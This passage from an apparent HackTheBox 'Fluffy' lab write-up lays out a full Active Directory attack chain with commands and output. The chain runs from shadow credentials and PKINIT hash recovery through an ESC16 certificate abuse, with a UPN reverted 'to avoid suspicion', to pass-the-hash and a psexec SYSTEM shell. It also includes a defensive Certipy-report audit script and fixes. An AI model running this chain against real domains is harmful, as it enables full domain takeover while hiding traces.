    FullName                      : DC01.fluffy.htb\fluffy-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Cert Thumbprint               : 5A359CF86FF5C22818C70CC23B71A47A2F2A715E
    Cert Serial                   : 3670C4A715B864BB497F7CD72119B6F5
    Cert Start Date               : 4/17/2025 9:00:16 AM
    Cert End Date                 : 4/17/3024 9:11:16 AM
    Cert Chain                    : CN=fluffy-DC01-CA,DC=fluffy,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               FLUFFY\Domain Admins          S-1-5-21-497550768-2797716248-2627064577-512
      Allow  Enroll                                     FLUFFY\Cert Publishers        S-1-5-21-497550768-2797716248-2627064577-517
      Allow  ManageCA, ManageCertificates               FLUFFY\Enterprise Admins      S-1-5-21-497550768-2797716248-2627064577-519
    Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!
```

shadow credentials again, this time on ca_svc (GenericWrite)

```sh
pywhisker -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "ca_svc" --action add
[*] Searching for the target account
[*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6f588113-8b11-f0f2-7acd-db2d4919305b
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: v7zf6rNG.pfx
[*] Must be used with password: h03ZMsCdeL68k0eUH1LY
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```

Generate a Kerberos TGT for ca_svc with the PFX:

```sh
sudo ntpdate 10.10.11.69 && python3 /opt/linux/PKINITtools/gettgtpkinit.py fluffy.htb/ca_svc -cert-pfx ./v7zf6rNG.pfx -pfx-pass h03ZMsCdeL68k0eUH1LY ca_svc.ccache
2025-05-29 00:08:34.304809 (-0400) +25201.393199 +/- 0.011307 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.393199
2025-05-29 00:08:34,505 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-05-29 00:08:34,518 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-05-28 17:08:37,355 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-05-28 17:08:37,355 minikerberos INFO     6cd2aa9061b15e830b6ee7601665446a0347cf3ed0011143466b5e27721b8ce2
INFO:minikerberos:6cd2aa9061b15e830b6ee7601665446a0347cf3ed0011143466b5e27721b8ce2
2025-05-28 17:08:37,358 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file
```

```sh
export KRB5CCNAME=/home/sake/htb-labs/Fluffy/ca_svc.ccache
```

```sh
sudo ntpdate 10.10.11.69 & python3 /opt/linux/PKINITtools/getnthash.py -key 6cd2aa9061b15e830b6ee7601665446a0347cf3ed0011143466b5e27721b8ce2 fluffy.htb/ca_svc
[1] 187996
2025-05-29 00:09:20.925879 (-0400) +25201.391788 +/- 0.013866 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.391788
[1]  + done       sudo ntpdate 10.10.11.69
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
ca0f4f9e...
```

```sh
nxc smb 10.10.11.69 -u ca_svc -H 'ca0f4f9e...'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\ca_svc:ca0f4f9e... 
```

```sh
cat 20250529093658_Certipy.json
{
  "Certificate Authorities": {
    "0": {
      "CA Name": "fluffy-DC01-CA",
      "DNS Name": "DC01.fluffy.htb",
      "Certificate Subject": "CN=fluffy-DC01-CA, DC=fluffy, DC=htb",
      "Certificate Serial Number": "3670C4A715B864BB497F7CD72119B6F5",
      "Certificate Validity Start": "2025-04-17 16:00:16+00:00",
      "Certificate Validity End": "3024-04-17 16:11:16+00:00",
      "Web Enrollment": {
        "http": {
          "enabled": false
        },
        "https": {
          "enabled": false,
          "channel_binding": null
        }
      },
      "User Specified SAN": "Disabled",
      "Request Disposition": "Issue",
      "Enforce Encryption for Requests": "Enabled",
      "Active Policy": "CertificateAuthority_MicrosoftDefault.Policy",
      "Disabled Extensions": [
        "1.3.6.1.4.1.311.25.2"
      ],
      "Permissions": {
        "Owner": "FLUFFY.HTB\\Administrators",
        "Access Rights": {
          "1": [
            "FLUFFY.HTB\\Domain Admins",
            "FLUFFY.HTB\\Enterprise Admins",
            "FLUFFY.HTB\\Administrators"
          ],
          "2": [
            "FLUFFY.HTB\\Domain Admins",
            "FLUFFY.HTB\\Enterprise Admins",
            "FLUFFY.HTB\\Administrators"
          ],
          "512": [
            "FLUFFY.HTB\\Cert Publishers"
          ]
        }
      },
      "[!] Vulnerabilities": {
        "ESC16": "Security Extension is disabled."
      },
      "[*] Remarks": {
        "ESC16": "Other prerequisites may be required for this to be exploitable. See the wiki for more details."
      }
    }
  },
  "Certificate Templates": "[!] Could not find any certificate templates"
}
```

ESC16

```sh
certipy-ad account -u 'p.agila' -p 'prometheusx-303' -target 'fluffy.htb' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'
```

```sh
certipy-ad account -u 'p.agila' -p 'prometheusx-303' -dc-ip 10.10.11.69 -user 'ca_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : administrator
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-05-29T21:23:33+00:00
```

```sh
certipy-ad req -dc-ip '10.10.11.69' -u 'ca_svc' -hashes ':ca0f4f9e...' -target 'fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```

Revert the UPN to its original value to avoid suspicion:

```sh
certipy-ad account -username p.agila@fluffy.htb -p prometheusx-303 -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
```
```sh
sudo ntpdate 10.10.11.69 && certipy-ad auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.10.11.69
2025-05-29 17:41:09.439991 (-0400) +25201.270124 +/- 0.008981 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.270124
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435...:8da83a3f...
```
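The ESC16 chain above works because the CA lists the certificate security extension (OID 1.3.6.1.4.1.311.25.2, szOID_NTDS_CA_SECURITY_EXT) as disabled: the issued certificate carries no requester SID ("Certificate has no object SID"), so a KDC still in compatibility mode falls back to mapping it by UPN, and the temporarily rewritten UPN on ca_svc maps it to the built-in Administrator. The audit helper below is an added example written for this writeup, not Certipy's code. It reads a Certipy JSON report (a trimmed copy of the one shown above is embedded) and flags the CA-level findings, and it checks a set of account records for the UPN tampering this technique relies on. The account records are constructed from the `certipy-ad ... read` output and the user list earlier on the page; the Administrator and winrm_svc UPN values are assumptions.

```python
"""Audit helpers for the two conditions the ESC16 path depends on:

1. the CA lists the certificate security extension (OID 1.3.6.1.4.1.311.25.2,
   szOID_NTDS_CA_SECURITY_EXT) as disabled, so issued certificates carry no
   requester SID and a KDC in compatibility mode falls back to UPN mapping;
2. an account's userPrincipalName has been pointed at a different principal.

Added example for this writeup, not Certipy's code. The CA record is a trimmed
copy of the Certipy JSON shown above; the account records are constructed.
"""
import json

SECURITY_EXT_OID = "1.3.6.1.4.1.311.25.2"

CERTIPY_JSON = json.loads("""{
  "Certificate Authorities": {
    "0": {
      "CA Name": "fluffy-DC01-CA",
      "DNS Name": "DC01.fluffy.htb",
      "Web Enrollment": {"http": {"enabled": false},
                         "https": {"enabled": false, "channel_binding": null}},
      "User Specified SAN": "Disabled",
      "Request Disposition": "Issue",
      "Disabled Extensions": ["1.3.6.1.4.1.311.25.2"]
    }
  },
  "Certificate Templates": "[!] Could not find any certificate templates"
}""")


def audit_ca(ca: dict) -> list:
    """Flag CA-level weaknesses visible in one Certipy 'Certificate Authorities' entry."""
    issues = []
    if SECURITY_EXT_OID in ca.get("Disabled Extensions", []):
        issues.append("ESC16: security extension disabled, issued certs carry no SID")
    if ca.get("User Specified SAN") == "Enabled":
        issues.append("ESC6: requesters may supply their own SAN")
    web = ca.get("Web Enrollment", {})
    if web.get("http", {}).get("enabled"):
        issues.append("ESC8: HTTP web enrollment is an NTLM relay target")
    if web.get("https", {}).get("enabled") and not web["https"].get("channel_binding"):
        issues.append("ESC8: HTTPS web enrollment without channel binding")
    return issues


def audit_report(report: dict) -> dict:
    """Map every CA in a Certipy JSON report to its list of findings."""
    cas = report.get("Certificate Authorities", {})
    return {ca["CA Name"]: audit_ca(ca) for ca in cas.values()}


def upn_anomalies(accounts: list, domain: str) -> list:
    """Report UPNs that lack the domain suffix or whose local part names another account."""
    by_sam = {a["sAMAccountName"].lower(): a["sAMAccountName"] for a in accounts}
    out = []
    for acct in accounts:
        sam = acct["sAMAccountName"]
        upn = acct.get("userPrincipalName") or ""
        if not upn:
            continue
        local, _, suffix = upn.partition("@")
        if suffix.lower() != domain.lower():
            out.append((sam, f"UPN '{upn}' has no or a foreign suffix"))
        if local.lower() != sam.lower() and local.lower() in by_sam:
            out.append((sam, f"UPN '{upn}' resolves to {by_sam[local.lower()]}"))
    return out


# Constructed records; ca_svc mirrors the tampered state shown above.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userPrincipalName": "Administrator@fluffy.htb"},
    {"sAMAccountName": "winrm_svc", "userPrincipalName": "winrm_svc@fluffy.htb"},
    {"sAMAccountName": "ca_svc", "userPrincipalName": "administrator"},
]

if __name__ == "__main__":
    for ca_name, issues in audit_report(CERTIPY_JSON).items():
        print(ca_name, issues or ["no CA-level issues"])
    for sam, why in upn_anomalies(SAMPLE_ACCOUNTS, "fluffy.htb"):
        print(f"[!] {sam}: {why}")
```

The fixes that close the two findings are the ones the checks imply: re-enable the security extension on the CA (remove the OID from the policy module's DisableExtensionList and restart the CA service) so every certificate again embeds the requester SID, and move the KDC to full enforcement (StrongCertificateBindingEnforcement = 2 from KB5014754), which refuses certificates that cannot be strongly mapped to an account. With either in place, the rewritten UPN no longer gives the certificate a path to Administrator.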
```sh
nxc smb 10.10.11.69 -u administrator -H '8da83a3f...'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\administrator:8da83a3f... (Pwn3d!)
```

```sh
impacket-psexec administrator@10.10.11.69 -hashes :8da83a3f...
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.11.69.....
[*] Found writable share ADMIN$
[*] Uploading file rVZCDuqz.exe
[*] Opening SVCManager on 10.10.11.69.....
[*] Creating service eVbh on 10.10.11.69.....
[*] Starting service eVbh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6893]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

```sh
C:\Users\Administrator\Desktop> type root.txt
2c746b61...
```